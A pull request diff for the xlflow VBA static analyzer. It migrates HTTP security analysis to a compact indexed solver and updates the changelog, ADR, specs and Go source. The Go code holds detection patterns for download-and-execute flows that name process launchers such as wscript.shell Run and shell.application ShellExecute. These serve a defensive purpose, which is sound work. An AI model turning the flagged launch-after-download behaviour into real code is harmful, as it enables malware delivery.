### PR TITLE
perf(analyze): complete compact HTTP state and prepare v0.31.0

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,8 @@ All notable changes to xlflow will be documented in this file.
 
 ## Unreleased
 
+## v0.31.0
+
 - Updated the tree-sitter-vba parser dependency to v0.12.2. Exported VBA
   procedure attributes with multi-segment names now parse without recovery,
   preserving downstream lint and analysis behavior.

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -27,12 +27,14 @@ All notable changes to xlflow will be documented in this file.
   boundaries remain available; Array, Object, Error, and return-path
   diagnostics, CLI JSON, and LSP contracts are unchanged.
 
-- Introduced the internal indexed semantic-state solver at the HTTP transport
-  scheduling boundary and for the ordinary Array CFG walk. Revision-local
-  `SymbolID` and `BlockOrdinal` indexes, dense/sparse slot storage, in-place
-  joins, and a deterministic changed-state worklist preserve diagnostic,
-  snapshot, CLI JSON, and LSP contracts. HTTP nested-map scalarization and
-  source-line/edge-refinement Array paths remain follow-up migrations.
+- Completed the HTTP portion of the indexed semantic-state solver migration.
+  HTTP transport facts now use revision-local scalar slots with in-place joins
+  and changed-state worklist updates; the fixed-point path no longer clones or
+  joins a nested `httpAnalysisState`. Deterministic post-convergence evidence
+  replay preserves recognized-client, TLS, credential, timeout,
+  module-constant, and download/execute diagnostics, including VBA224
+  duplicate suppression, batch/realtime ordering, CLI JSON, and LSP contracts.
+  Array source-line/edge-refinement paths remain follow-up migrations.
 
 - Extended the indexed semantic-state solver to advanced Array CFG paths,
   including source-line lifecycle ordering, normal-edge refinement,

--- a/docs/adr/ADR-0047-compact-semantic-state-solver.md
+++ b/docs/adr/ADR-0047-compact-semantic-state-solver.md
@@ -63,10 +63,10 @@ and sparse storage otherwise. Representation benchmarks cover dense, sparse,
 and hybrid choices; changing these constants requires new benchmark evidence.
 Slot values are scalar IDs, flags, or bounded handles to immutable interned
 values. The ordinary Array adapter follows this rule and keeps dimension
-shapes in the value lattice. The initial HTTP adapter intentionally retains
-the legacy `httpAnalysisState` nested maps in one compatibility slot while
-its semantic-unit scalarization is developed separately; this exception is
-why the Issue #713 allocation target remains open.
+shapes in the value lattice. The initial HTTP adapter retained the legacy
+`httpAnalysisState` nested maps in one compatibility slot. Issue #720 removes
+that temporary boundary for the HTTP transport kernel; the historical adapter
+is retained only as the #713 baseline used by differential measurements.
 
 ### Joins and convergence
 
@@ -100,19 +100,43 @@ rules. Semantic state may retain only bounded membership required to decide a
 later transfer (for example an interned executable-path set); evidence itself
 must not cause state copies or affect equality.
 
-### Migration boundary
+### HTTP scalarization follow-up (#720)
 
-The first migration covers the HTTP scheduler boundary (`solveHTTPStates`)
-and the ordinary block-level `arrayFlowState` walk. HTTP's nested state is
-not yet compacted into semantic-unit slots. Issue #721 amends this boundary
-for the remaining Array paths without changing the semantic lattice. The
-source-line lifecycle lane, normal-edge refinement, exceptional/uncertain
-edges, and combined runtime/evidence lanes use the same indexed solver when
-their participant index and transfer contract can be built before execution.
-Existing diagnostic IDs, severity, ranges, messages, suppression, JSON, LSP
-projections, batch/realtime parity, and performance-counter meanings remain
-unchanged. Generic `internal/vba/dataflow`, CFG storage, cross-run caching,
-and unrelated semantic domains remain outside this decision.
+Issue #720 completes the HTTP portion of this migration. Each procedure
+revision builds one immutable, case-insensitive `httpCompactEnvironment`.
+Declarations, module constants, constructor sites, launcher names, interned
+strings/URLs, and save sites receive deterministic revision-local IDs; those
+IDs and immutable declarations are never copied into block states.
+
+The HTTP fixed-point state contains only indexed scalar slots. Object slots
+carry explicit presence/unknown state plus kind, identity, known URL,
+credential, timeout, and downloaded facts. Launcher, string/value, sensitive,
+and saved-path facts use independent slots. Absence and unknown are represented
+in the lattice rather than by missing nested-map keys. Object assignment copies
+the source slots, identity-preserving member updates reach aliases, and
+constructor or uncertain reassignments invalidate only the target slots.
+
+Joins update the destination slots in place and report only changed
+`SymbolID`s. Equality and join retain the previous conservative contracts:
+identity/kind/URL/value facts meet on agreement, credential/timeout-infinite/
+sensitive facts union, timeout-configured/downloaded facts intersect, and
+saved executable paths retain only an agreed value. No transfer clones or
+joins a complete `httpAnalysisState`.
+
+Diagnostic evidence remains outside the fixed-point state. After convergence,
+HTTP findings are projected in deterministic CFG/source order. Credential sink
+evidence is reconstructed by a separate indexed replay so aliasing, kills,
+exceptional/uncertain edges, and VBA224 duplicate suppression retain their
+previous behavior without making witness data part of state equality.
+
+The shared solver still owns deterministic scheduling, cancellation, and the
+single-thread execution boundary. Existing diagnostic IDs, severity, ranges,
+messages, suppression, JSON, LSP projections, batch/realtime parity, and
+performance-counter meanings remain unchanged. Array source-line traversal,
+edge-refinement callbacks, and interprocedural evidence walkers continue on
+the indexed boundary documented by Issue #721; generic `internal/vba/dataflow`,
+CFG storage, cross-run caching, and unrelated semantic domains remain outside
+this decision.
 
 ### Amendment: advanced Array paths on the indexed solver (Issue #721)
 
@@ -178,9 +202,8 @@ values are retained in the corpus specification.
 ## Consequences
 
 - Ordinary Array state copies become proportional to compact slot values or
-  active sparse entries. HTTP gains deterministic indexed scheduling and
-  cancellation through the shared boundary, but its compatibility slot still
-  copies nested maps until the follow-up scalarization.
+  active sparse entries. HTTP now uses the same indexed, changed-slot state
+  boundary, so its fixed-point path no longer copies nested maps.
 - The solver and domain adapters have a narrow ownership boundary that can be
   reused by later semantic kernels without exposing analyzer or protocol APIs.
 - Deterministic indexed scheduling and changed-slot reporting make convergence
@@ -219,10 +242,33 @@ values are retained in the corpus specification.
 7. **Persist solver results across runs** — Rejected because invalidation and
    compatibility are a separate cache decision.
 
+## Completion record (#720)
+
+The HTTP scalarization boundary and evidence replay are complete in the
+implementation described above. The baseline is
+`6c9f8ba60c5b162cb7115e8e68744412c7de9d5d`; the implementation was verified at
+`f47e3b56` plus the working tree changes. The ordered pre-migration digest
+matrix and batch/realtime parity tests pass without a diagnostic or snapshot
+delta. The required command matrix and measured allocation record are
+maintained in `docs/specs/static-analysis-corpus.md` under the #720
+verification record; profile files remain local developer artifacts.
+
+The `-race` analyzer and semanticstate runs, two verify-only corpus runs, and
+corpus metrics all passed. The five-sample ROneCOne record and focused profiles
+show that
+`cloneHTTPState`, `joinHTTPState`, and nested HTTP map growth are absent from
+the production fixed-point path. Any diagnostic, snapshot, ordering, or
+review-ledger delta requires investigation before the record is completed.
+
 ## Evidence
 
 - `internal/analyze/http_transport.go` (`httpAnalysisState`,
-  `solveHTTPStates`, `cloneHTTPState`, `joinHTTPState`).
+  `solveHTTPStates`, and the compatibility constant/planner helpers).
+- `internal/analyze/http_compact_state.go` (the indexed HTTP environment,
+  scalar lattice, solver transfer, projection, and credential-evidence replay).
+- `internal/analyze/http_transport_differential_test.go` and
+  `internal/analyze/http_transport_benchmark_test.go` (pre-migration digest
+  oracle and HTTP allocation-shape benchmarks).
 - `internal/analyze/array_safety.go` (`arrayFlowState`,
   `walkArrayCFGWorklist`, `walkArrayCFGCombined`, `cloneArrayState`,
   `meetArrayState`).
@@ -240,6 +286,7 @@ values are retained in the corpus specification.
 ## Related
 
 - Issue #713: `perf(dataflow): introduce a compact semantic state solver`
+- Issue #720: `Follow-up: scalarize HTTP analysis state in the compact solver`
 - Issue #693: shared semantic analysis kernel performance wave
 - ADR-0021, ADR-0022,
   `docs/adr/ADR-0044-bounded-procedure-effect-summaries.md`, ADR-0046, and

--- a/docs/specs/static-analysis-corpus.md
+++ b/docs/specs/static-analysis-corpus.md
@@ -1858,6 +1858,99 @@ alloc-space profile demonstrates the three-leaf reduction; the large
 end-to-end benchmark values remain recorded for follow-up rather than
 treated as a CI time threshold.
 
+### HTTP compact-state scalarization verification record (#720)
+
+Issue #720 completes the HTTP portion of the compact semantic-state solver
+migration left open by #713. The HTTP fixed-point path must not clone or join a
+complete nested `httpAnalysisState`; revision-local scalar slots, in-place
+joins, and changed-slot worklist updates are the only semantic propagation
+state. Immutable HTTP names/declarations belong to the procedure revision
+environment. Diagnostic evidence remains a post-convergence projection and
+separate credential-sink replay.
+
+The differential comparison uses the #713 baseline revision
+`6c9f8ba60c5b162cb7115e8e68744412c7de9d5d` and implementation revision
+`f47e3b56` plus the working tree changes, on the same Windows host and Go
+toolchain. Batch and realtime
+surfaces must produce identical ordered finding digests for both revisions.
+The digest includes code, range, severity, API, risk, header/origin/timeout,
+multiplicity, redaction, and VBA224 duplicate suppression. The focused matrix
+covers recognized early- and late-bound clients, TLS options,
+URL/header/`SetCredentials` flows, finite/missing/unbounded timeouts, module
+constants, sensitive logging, and download/save/execute flows. CFG regressions
+cover loops, branch joins, exceptional and uncertain edges, same- and
+different-identity aliases, unknown values, conflicting assignments, and
+recovered statements.
+
+The required focused and race checks are:
+
+```powershell
+rtk powershell -NoProfile -ExecutionPolicy Bypass -File .\scripts\dev\go.ps1 test -race ./internal/analyze
+rtk powershell -NoProfile -ExecutionPolicy Bypass -File .\scripts\dev\go.ps1 test -race ./internal/analyze/semanticstate
+```
+
+Corpus verification is read-only and must be repeated without refreshing
+snapshots:
+
+```powershell
+rtk task corpus:test
+rtk task corpus:test
+rtk task corpus:metrics
+```
+
+The ROneCOne leaf uses five serial samples on the same environment:
+
+```powershell
+rtk powershell -NoProfile -ExecutionPolicy Bypass -File .\scripts\dev\go.ps1 test ./internal/staticanalysis/corpus -run '^$' -bench '^BenchmarkRealWorldCorpus/ronecone/analyze-only$' -benchmem -benchtime=1x -count=5 -timeout=10m
+```
+
+The implementation also records the HTTP-focused benchmark for linear, wide,
+branch/loop/alias, and download/execute workloads, keeping fixture construction
+outside the timed region. Five serial samples on this host had these medians:
+
+| workload          | median ns/op | median B/op | median allocs/op |
+| ----------------- | -----------: | ----------: | ---------------: |
+| linear            |      287,500 |     182,296 |              788 |
+| branch/loop/alias |      604,900 |     416,056 |            1,916 |
+| wide constants    |      376,400 |     262,376 |            1,131 |
+| download/execute  |      670,500 |     471,712 |            2,084 |
+
+The before/after ROneCOne allocation record uses the same command and retained
+local heap profiles:
+
+| revision                                                   |   median ns/op |    median B/op | median allocs/op | `cloneHTTPState` / related alloc-space | profile paths                                   |
+| ---------------------------------------------------------- | -------------: | -------------: | ---------------: | -------------------------------------- | ----------------------------------------------- |
+| #713 baseline (`6c9f8ba60c5b162cb7115e8e68744412c7de9d5d`) | 21,621,334,100 | 11,231,956,152 |       81,828,012 | 67.13 MB / 35,101 objects              | `%TEMP%\xlflow-720-baseline-ronecone.mem.pprof` |
+| #720 (`f47e3b56` + working tree)                           | 10,352,922,100 | 11,653,406,520 |       90,718,921 | 0 / 0 (focus matched no samples)       | `%TEMP%\xlflow-720-ronecone-final2.mem.pprof`   |
+
+Raw five-sample wall times were 9.381, 9.256, 21.621, 31.806, and 36.889 s
+for the baseline and 9.693, 10.340, 10.353, 25.029, and 11.263 s for #720.
+The baseline timing spread is a host-level observation; allocation medians are
+the stable comparison. Whole-workload bytes and objects are higher in this
+single migration sample because the compact indexed lane and the unchanged
+Array paths have different fixed costs. The targeted HTTP clone/join symbols,
+however, disappear from both production allocation profiles, which is the
+boundary contribution tracked by #720; the combined #713 50% target remains an
+Array follow-up measurement.
+
+For one-sample profile capture, use the issue benchmark with `-count=1`,
+`-cpuprofile`, `-memprofile`, and `-o`, then inspect allocation space and
+objects with:
+
+```powershell
+rtk go tool pprof -sample_index=alloc_space -focus 'cloneHTTPState|joinHTTPState|cloneHTTPObject' -top <benchmark-binary> <heap-profile>
+rtk go tool pprof -sample_index=alloc_objects -focus 'cloneHTTPState|joinHTTPState|cloneHTTPObject' -top <benchmark-binary> <heap-profile>
+```
+
+The completed record must show a material reduction in HTTP state allocations
+and no production fixed-point samples attributable to the removed nested-map
+clone/join boundary. It must also record deterministic changed-slot behavior,
+explicit absence/unknown joins, alias propagation, cancellation, and the
+existing no-worker-pool execution boundary. These are developer measurements,
+not CI thresholds. Any unexplained diagnostic identity, range, severity,
+evidence, multiplicity, ordering, snapshot, or review-ledger delta is a
+stop-and-investigate condition; ordinary tests must never rewrite snapshots.
+
 ### Revision-scoped semantic query DAG verification requirements (#715)
 
 Issue #715 adds process-local, revision-scoped reuse for immutable semantic

--- a/docs/specs/vba-analysis-ir.md
+++ b/docs/specs/vba-analysis-ir.md
@@ -700,15 +700,25 @@ verification matrix is in `docs/specs/vba-semantic-query-dag.md`.
 ### Indexed semantic-state solver boundary
 
 The HTTP transport kernel and the ordinary Array block-level walk use the
-internal `internal/analyze/semanticstate` solver. The ordinary Array adapter
-uses compact flow slots; HTTP currently uses one compatibility slot containing
-the legacy nested state while semantic-unit scalarization remains follow-up
-work. A procedure revision builds
-an immutable, case-insensitive environment with revision-local `SymbolID`
-values and a deterministic CFG `BlockOrdinal` index. Mutable flow states,
-scratch buffers, cancellation checks, and the `(BlockOrdinal, LaneOrdinal)`
-worklist remain owned by one solver invocation; no state or index is shared
-across revisions or nested worker pools.
+internal `internal/analyze/semanticstate` solver. Both adapters use compact
+flow slots. The HTTP transport no longer stores a full nested
+`httpAnalysisState` in a compatibility slot: each procedure revision builds an
+immutable, case-insensitive HTTP environment with revision-local `SymbolID`
+values and a deterministic CFG `BlockOrdinal` index. Declarations, module
+constants, constructor/launcher sites, interned strings/URLs, and save sites
+belong to that immutable environment. Mutable flow states, scratch buffers,
+cancellation checks, and the `(BlockOrdinal, LaneOrdinal)` worklist remain
+owned by one solver invocation; no state or index is shared across revisions
+or nested worker pools.
+
+HTTP facts are represented by independent indexed scalar slots. Object slots
+carry explicit presence/unknown state and the object kind, identity, known URL,
+credentials, timeout, and downloaded facts. Launcher, string/value, sensitive,
+and saved executable-path facts use separate slots. Assignment copies the
+source slots, identity-based member updates propagate through aliases, and
+uncertain reassignments invalidate only the affected target. Unknown/absence
+and the existing conservative intersection/union behavior are part of the
+lattice, not implicit missing map entries.
 
 The solver stores present slots in dense bitset-backed storage for small or
 dense domains and sorted sparse storage for wide, sparse domains. Domain joins
@@ -768,6 +778,24 @@ unsupported-contract) are developer-only telemetry.
 They are not public IR fields and never appear in CLI JSON, LSP payloads,
 corpus snapshots, or the diagnostic review ledger. The shared solver API and
 dense/sparse/hybrid benchmarks remain internal implementation details.
+Exceptional and uncertain edges retain predecessor input
+state. HTTP joins preserve the previous contracts: identity/kind/URL/value
+facts require agreement, credential/timeout-infinite/sensitive facts use union,
+timeout-configured/downloaded facts use intersection, and saved paths retain
+only an agreed value. Source ranges, representative evidence, credential sink
+witnesses, and finding multiplicity are not part of semantic state.
+
+After fixed-point convergence, HTTP diagnostics are produced by a deterministic
+CFG-order projection. Credential sink evidence is reconstructed by a separate
+indexed replay so aliasing, kills, exceptional/uncertain edges, and VBA224
+duplicate suppression remain compatible without adding witness allocations to
+the solver state.
+
+The HTTP block-level fixed-point state is fully scalarized. Remaining
+compatibility walkers are limited to explicitly out-of-scope generic dataflow
+and unrelated semantic domains. The shared solver API and dense/sparse/hybrid
+benchmarks are internal implementation details and do not add CLI, JSON, or
+LSP fields.
 
 ### Batch procedure-worker boundary
 

--- a/internal/analyze/http_compact_state.go
+++ b/internal/analyze/http_compact_state.go
@@ -336,11 +336,13 @@ func buildHTTPCompactEnvironment(file parsedFile, proc sourceProcedure, initial 
 	}, semanticstate.NewEnvironment(names, names)
 }
 
-// httpCompactProcedureStringCandidates is an allocation-bounded, conservative
-// pre-scan used only to allocate saved-path symbols.  It gathers literal and
-// module-constant values assigned to procedure-local names, retaining all
-// values seen across branches so that a later SaveToFile site has a stable
-// path slot even when its path is not available in the entry state.
+// httpCompactProcedureStringCandidates is a pre-scan used only to allocate
+// saved-path symbols. It gathers literal and module-constant values assigned
+// to procedure-local names, retaining all values seen across branches so that
+// a later SaveToFile site has a stable path slot even when its path is not
+// available in the entry state. Candidate truncation is intentionally not
+// allowed here: every retained path is a semantic symbol, and dropping one
+// would make a later download-and-execute finding depend on enumeration order.
 func httpCompactProcedureStringCandidates(proc sourceProcedure, initial httpAnalysisState) map[string]map[string]bool {
 	values := map[string]map[string]bool{}
 	for name, value := range initial.strings {
@@ -394,7 +396,6 @@ func httpCompactStringCandidates(expr string, values map[string]map[string]bool)
 		return nil
 	}
 	candidates := []string{""}
-	const maxCandidates = 64
 	for _, rawPart := range parts {
 		part := strings.TrimSpace(rawPart)
 		var pieces []string
@@ -410,16 +411,15 @@ func httpCompactStringCandidates(expr string, values map[string]map[string]bool)
 		if len(pieces) == 0 {
 			return nil
 		}
+		// Do not cap the Cartesian product. The result is used to allocate the
+		// immutable saved-path symbols, so a cap would silently discard a
+		// statically possible executable path. The fixed-point state itself
+		// remains scalar; this pre-scan only materializes the finite candidates
+		// that the source actually provides.
 		next := make([]string, 0, len(candidates)*len(pieces))
 		for _, prefix := range candidates {
 			for _, piece := range pieces {
-				if len(next) == maxCandidates {
-					break
-				}
 				next = append(next, prefix+piece)
-			}
-			if len(next) == maxCandidates {
-				break
 			}
 		}
 		candidates = next
@@ -1101,6 +1101,17 @@ func httpCompactIsProcessLaunch(text string, view semanticstate.StateView[httpSc
 		start--
 	}
 	if start == end {
+		return false
+	}
+	// A launcher receiver is a simple identifier. If another member-access
+	// dot precedes it, the expression is a qualified chain such as
+	// `wrapper.shell.Run`; the suffix `shell` must not be looked up as if it
+	// were an independently tracked launcher variable.
+	prefix := start - 1
+	for prefix >= 0 && (text[prefix] == ' ' || text[prefix] == '\t') {
+		prefix--
+	}
+	if prefix >= 0 && (text[prefix] == '.' || text[prefix] == ')' || text[prefix] == ']') {
 		return false
 	}
 	receiver := strings.ToLower(text[start:end])

--- a/internal/analyze/http_compact_state.go
+++ b/internal/analyze/http_compact_state.go
@@ -760,12 +760,14 @@ func solveHTTPCompactStates(ctx context.Context, a Analyzer, file parsedFile, pr
 			statements[block.Statement.ID] = block.ID
 		}
 	}
-	base := &httpCompactSolve{env: env, environment: environment, result: result, blocks: blocks, reachable: reachable, statements: statements}
+	base := &httpCompactSolve{index: index, env: env, environment: environment, result: result, blocks: blocks, reachable: reachable, statements: statements}
 	evidence, err := solveHTTPEvidence(ctx, file, proc, graph, initial, base)
 	if err != nil {
 		return nil, err
 	}
-	return &httpCompactSolve{index: index, env: env, environment: environment, result: result, blocks: blocks, reachable: reachable, statements: statements, evidence: evidence, projection: semanticstate.NewState[httpScalar](environment.Layout())}, nil
+	base.evidence = evidence
+	base.projection = semanticstate.NewState[httpScalar](environment.Layout())
+	return base, nil
 }
 
 func httpCompactTransfer(file parsedFile, proc sourceProcedure, statement procedureir.Statement, e *httpCompactEnvironment, input semanticstate.StateView[httpScalar], output *semanticstate.State[httpScalar], collect bool, evidence *httpEvidenceState) []httpFindingSpec {
@@ -1100,7 +1102,11 @@ func httpCompactIsProcessLaunch(text string, view semanticstate.StateView[httpSc
 			break
 		}
 	}
-	launcher := httpCompactValue(view, e.launchers[receiver])
+	launcherSlot, ok := e.launchers[receiver]
+	if !ok {
+		return false
+	}
+	launcher := httpCompactValue(view, launcherSlot)
 	return launcher.present && ((launcher.text == "wscript.shell" && (method == "run" || method == "exec")) || (launcher.text == "shell.application" && method == "shellexecute"))
 }
 

--- a/internal/analyze/http_compact_state.go
+++ b/internal/analyze/http_compact_state.go
@@ -1,0 +1,1288 @@
+package analyze
+
+// This file contains the HTTP domain adapter for semanticstate.  The legacy
+// httpAnalysisState remains available to the module-constant planner and to
+// compatibility tests, but it never crosses a semanticstate solver edge.
+
+import (
+	"context"
+	"fmt"
+	"sort"
+	"strconv"
+	"strings"
+
+	"github.com/harumiWeb/xlflow/internal/analyze/semanticstate"
+	vbacfg "github.com/harumiWeb/xlflow/internal/vba/cfg"
+	"github.com/harumiWeb/xlflow/internal/vba/procedureir"
+)
+
+type httpCompactSlotKind uint8
+
+const (
+	httpCompactObjectSlot httpCompactSlotKind = iota
+	httpCompactLauncherSlot
+	httpCompactValueSlot
+	httpCompactSensitiveSlot
+	httpCompactSavedSlot
+)
+
+// httpScalar is deliberately map-free.  Its strings are immutable values
+// shared by the revision; Clone is therefore a plain value copy.
+type httpScalar struct {
+	class   httpCompactSlotKind
+	present bool
+	flag    bool
+	text    string
+	object  httpCompactObject
+}
+
+type httpCompactObject struct {
+	present           bool
+	kind              httpClientKind
+	identity          string
+	url               string
+	urlKnown          bool
+	hasCredentials    bool
+	timeoutConfigured bool
+	timeoutInfinite   bool
+	downloaded        bool
+}
+
+type httpCompactSlot struct {
+	id       semanticstate.SymbolID
+	name     string
+	variable string
+	class    httpCompactSlotKind
+	siteID   int
+	path     string
+}
+
+type httpCompactEnvironment struct {
+	variables []string
+	saveSites []int
+	names     []string
+
+	objects   map[string]httpCompactSlot
+	launchers map[string]httpCompactSlot
+	values    map[string]httpCompactSlot
+	sensitive map[string]httpCompactSlot
+	saved     map[string][]httpCompactSlot
+	savedPath map[string][]httpCompactSlot
+	saveVars  map[string]bool
+	savePaths []string
+
+	initial       httpAnalysisState
+	identityByKey map[string]string
+	analyzer      Analyzer
+}
+
+func httpScalarZero(class httpCompactSlotKind) httpScalar {
+	return httpScalar{class: class}
+}
+
+type httpScalarLattice struct{}
+
+func (httpScalarLattice) Clone(value httpScalar) httpScalar { return value }
+
+func (httpScalarLattice) Join(dst *httpScalar, src httpScalar) bool {
+	if dst == nil {
+		return false
+	}
+	if dst.class != src.class {
+		return false
+	}
+	merged := *dst
+	switch dst.class {
+	case httpCompactObjectSlot:
+		if !dst.object.present || !src.object.present {
+			merged.object = httpCompactObject{}
+			break
+		}
+		object := dst.object
+		if object.kind != src.object.kind {
+			object.kind = httpUnknown
+		}
+		if object.identity != src.object.identity {
+			object.identity = ""
+		}
+		object.urlKnown = object.urlKnown && src.object.urlKnown && object.url == src.object.url
+		if !object.urlKnown {
+			object.url = ""
+		}
+		object.hasCredentials = object.hasCredentials || src.object.hasCredentials
+		object.timeoutConfigured = object.timeoutConfigured && src.object.timeoutConfigured
+		object.timeoutInfinite = object.timeoutInfinite || src.object.timeoutInfinite
+		object.downloaded = object.downloaded && src.object.downloaded
+		merged.object = object
+	case httpCompactLauncherSlot, httpCompactValueSlot:
+		if !dst.present || !src.present || dst.text != src.text {
+			merged.present = false
+			merged.text = ""
+		}
+	case httpCompactSensitiveSlot:
+		merged.present = dst.present || src.present
+		merged.flag = (dst.present && dst.flag) || (src.present && src.flag)
+	case httpCompactSavedSlot:
+		merged.present = dst.present && src.present && dst.text == src.text
+		if !merged.present {
+			merged.text = ""
+		}
+	}
+	if *dst == merged {
+		return false
+	}
+	*dst = merged
+	return true
+}
+
+func buildHTTPCompactEnvironment(file parsedFile, proc sourceProcedure, initial httpAnalysisState) (*httpCompactEnvironment, semanticstate.Environment) {
+	variables := map[string]bool{}
+	addVariable := func(name string) {
+		name = strings.ToLower(strings.TrimSpace(name))
+		if name != "" {
+			variables[name] = true
+		}
+	}
+	addIdentifiers := func(text string) {
+		for _, match := range httpIdentifierRe.FindAllString(text, -1) {
+			addVariable(match)
+		}
+	}
+	relevantStatement := func(text string) bool {
+		text = strings.TrimSpace(stripVBAFileComment(text))
+		if text == "" {
+			return false
+		}
+		return httpObjectAssignmentRe.MatchString(text) ||
+			httpMemberCallRe.MatchString(text) ||
+			httpOptionAssignmentRe.MatchString(text) ||
+			httpSetOptionCallRe.MatchString(text) ||
+			httpLogRe.MatchString(text) ||
+			httpObjectLauncherRe.MatchString(text) ||
+			httpWin32LauncherRe.MatchString(text) ||
+			strings.HasPrefix(strings.ToLower(text), "shell ")
+	}
+
+	// Start with declarations that are already proven HTTP objects and names
+	// used by HTTP statements. Do not index every identifier in the module:
+	// that turns a compact per-procedure environment into a dense copy of the
+	// whole source file on large modules.
+	for name := range initial.objects {
+		addVariable(name)
+	}
+	for name := range initial.launchers {
+		addVariable(name)
+	}
+	for _, statement := range proc.IR.Statements {
+		if relevantStatement(statement.Text) {
+			addIdentifiers(statement.Text)
+		}
+	}
+	// Save-path slots are needed only for variables that can be an ADO stream
+	// or that are an explicit SaveToFile receiver. Avoid allocating the full
+	// variable-by-site cross product for unrelated identifiers in a large
+	// procedure while remaining conservative for late-bound receivers.
+	saveVars := map[string]bool{}
+	for name, object := range initial.objects {
+		if object.kind == httpADOStream {
+			saveVars[name] = true
+		}
+	}
+	for _, statement := range proc.IR.Statements {
+		text := strings.TrimSpace(stripVBAFileComment(statement.Text))
+		if match := httpObjectAssignmentRe.FindStringSubmatch(text); len(match) == 3 {
+			target, rhs := strings.ToLower(match[1]), strings.TrimSpace(match[2])
+			if httpKindFromConstruction(rhs) == httpADOStream {
+				saveVars[target] = true
+			}
+		}
+		if match := httpMemberCallRe.FindStringSubmatchIndex(text); match != nil && strings.EqualFold(text[match[4]:match[5]], "SaveToFile") {
+			saveVars[strings.ToLower(text[match[2]:match[3]])] = true
+		}
+	}
+	saveChanged := true
+	for saveChanged {
+		saveChanged = false
+		for _, statement := range proc.IR.Statements {
+			text := strings.TrimSpace(stripVBAFileComment(statement.Text))
+			match := httpObjectAssignmentRe.FindStringSubmatch(text)
+			if len(match) != 3 {
+				continue
+			}
+			target, source := strings.ToLower(match[1]), strings.ToLower(strings.TrimSpace(match[2]))
+			if saveVars[source] && !saveVars[target] {
+				saveVars[target] = true
+				saveChanged = true
+			}
+		}
+	}
+
+	// Local constants and aliases can be assigned outside the HTTP statement
+	// itself (for example, url = BaseURL & "/download"). Pull in only the
+	// transitive assignment dependencies of names already referenced above.
+	changed := true
+	for changed {
+		changed = false
+		for _, statement := range proc.IR.Statements {
+			text := strings.TrimSpace(stripVBAFileComment(statement.Text))
+			name, expression, ok := fileAssignment(text)
+			if !ok || !variables[strings.ToLower(name)] {
+				continue
+			}
+			before := len(variables)
+			addIdentifiers(expression)
+			if len(variables) != before {
+				changed = true
+			}
+		}
+	}
+
+	// Module constants are immutable facts, but only constants reachable from
+	// the HTTP expression set need indexed slots. Their expression dependencies
+	// are added by the same fixed-point scan below.
+	moduleConstants := map[string]string{}
+	if facts := file.ModuleFacts; facts != nil {
+		facts.forEachConstant(func(constant moduleConstantFact) {
+			moduleConstants[strings.ToLower(strings.TrimSpace(constant.Name))] = constant.Expression
+		})
+	}
+	changed = true
+	for changed {
+		changed = false
+		for name, expression := range moduleConstants {
+			if !variables[name] {
+				continue
+			}
+			before := len(variables)
+			addIdentifiers(expression)
+			if len(variables) != before {
+				changed = true
+			}
+		}
+	}
+	for name := range initial.strings {
+		if variables[name] {
+			addVariable(name)
+		}
+	}
+	for name := range initial.known {
+		if variables[name] {
+			addVariable(name)
+		}
+	}
+	for name := range initial.sensitive {
+		if variables[name] {
+			addVariable(name)
+		}
+	}
+
+	vars := make([]string, 0, len(variables))
+	for name := range variables {
+		vars = append(vars, name)
+	}
+	sort.Strings(vars)
+	sites := map[int]bool{}
+	paths := map[string]bool{}
+	identityByKey := map[string]string{}
+	staticStrings := httpCompactProcedureStringCandidates(proc, initial)
+	for _, statement := range proc.IR.Statements {
+		text := strings.TrimSpace(stripVBAFileComment(statement.Text))
+		if match := httpMemberCallRe.FindStringSubmatchIndex(text); match != nil && strings.EqualFold(text[match[4]:match[5]], "SaveToFile") {
+			sites[statement.ID] = true
+			args := httpMethodArgs(text, match[1])
+			if len(args) > 0 {
+				for _, path := range httpCompactStringCandidates(args[0], staticStrings) {
+					if httpExecutableExtRe.MatchString(strings.ToLower(path)) {
+						paths[httpPathKey(path)] = true
+					}
+				}
+			}
+		}
+		if match := httpObjectAssignmentRe.FindStringSubmatch(text); len(match) == 3 {
+			if httpKindFromConstruction(strings.TrimSpace(match[2])) != httpUnknown {
+				identityByKey[strings.ToLower(match[1])+fmt.Sprintf("|%d", statement.ID)] = fmt.Sprintf("%s@%d", strings.ToLower(match[1]), statement.ID)
+			}
+		}
+	}
+	saveSites := make([]int, 0, len(sites))
+	for site := range sites {
+		saveSites = append(saveSites, site)
+	}
+	sort.Ints(saveSites)
+	savePaths := make([]string, 0, len(paths))
+	for path := range paths {
+		savePaths = append(savePaths, path)
+	}
+	sort.Strings(savePaths)
+
+	names := make([]string, 0, len(vars)*4+len(saveVars)*(len(saveSites)+len(savePaths)))
+	for _, variable := range vars {
+		names = append(names, "object:"+variable, "launcher:"+variable, "value:"+variable, "sensitive:"+variable)
+		if saveVars[variable] {
+			for _, site := range saveSites {
+				names = append(names, fmt.Sprintf("saved:%s:%d", variable, site))
+			}
+			for _, path := range savePaths {
+				names = append(names, "saved-path:"+variable+":"+path)
+			}
+		}
+	}
+	sort.Strings(names)
+	return &httpCompactEnvironment{
+		variables: vars, saveSites: saveSites, names: names, initial: initial,
+		objects: map[string]httpCompactSlot{}, launchers: map[string]httpCompactSlot{},
+		values: map[string]httpCompactSlot{}, sensitive: map[string]httpCompactSlot{},
+		saved: map[string][]httpCompactSlot{}, savedPath: map[string][]httpCompactSlot{}, saveVars: saveVars, savePaths: savePaths, identityByKey: identityByKey,
+	}, semanticstate.NewEnvironment(names, names)
+}
+
+// httpCompactProcedureStringCandidates is an allocation-bounded, conservative
+// pre-scan used only to allocate saved-path symbols.  It gathers literal and
+// module-constant values assigned to procedure-local names, retaining all
+// values seen across branches so that a later SaveToFile site has a stable
+// path slot even when its path is not available in the entry state.
+func httpCompactProcedureStringCandidates(proc sourceProcedure, initial httpAnalysisState) map[string]map[string]bool {
+	values := map[string]map[string]bool{}
+	for name, value := range initial.strings {
+		if !initial.known[name] {
+			continue
+		}
+		key := strings.ToLower(strings.TrimSpace(name))
+		if key == "" {
+			continue
+		}
+		values[key] = map[string]bool{value: true}
+	}
+	for pass := 0; pass <= len(proc.IR.Statements); pass++ {
+		changed := false
+		for _, statement := range proc.IR.Statements {
+			text := strings.TrimSpace(stripVBAFileComment(statement.Text))
+			name, expression, ok := fileAssignment(text)
+			if !ok || strings.HasPrefix(strings.ToLower(text), "set ") {
+				continue
+			}
+			candidates := httpCompactStringCandidates(expression, values)
+			if len(candidates) == 0 {
+				continue
+			}
